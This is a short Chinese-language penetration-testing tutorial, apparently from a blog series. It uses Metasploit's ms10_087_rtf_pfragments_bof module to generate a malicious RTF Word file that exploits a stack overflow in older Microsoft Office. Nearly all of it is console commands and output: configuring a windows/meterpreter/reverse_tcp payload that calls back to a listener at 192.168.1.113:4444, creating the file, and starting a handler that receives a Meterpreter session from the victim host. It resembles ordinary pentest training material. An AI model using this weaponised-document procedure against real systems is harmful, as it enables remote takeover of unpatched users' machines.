使用Metasploit生成Word文件对目标进行渗透测试

上一篇提到了使用恶意PDF对目标主机进行渗透测试，这次简单提一下使用word文件进行渗透攻击，没看过上一篇的可以看一下，了解下基本步骤
使用恶意PDF进行渗透测试

测试用例	描述
漏洞	microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击
受影响的系统	Microsoft Office XP SP，2003 SP3，2007 SP2，2010 x32，2010 x64，Microsoft Office for Mac 2011

生成恶意word文档

msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
omsf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf

加载handler

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.115:1885) at 2021-05-13 11:37:26 +0800

meterpreter >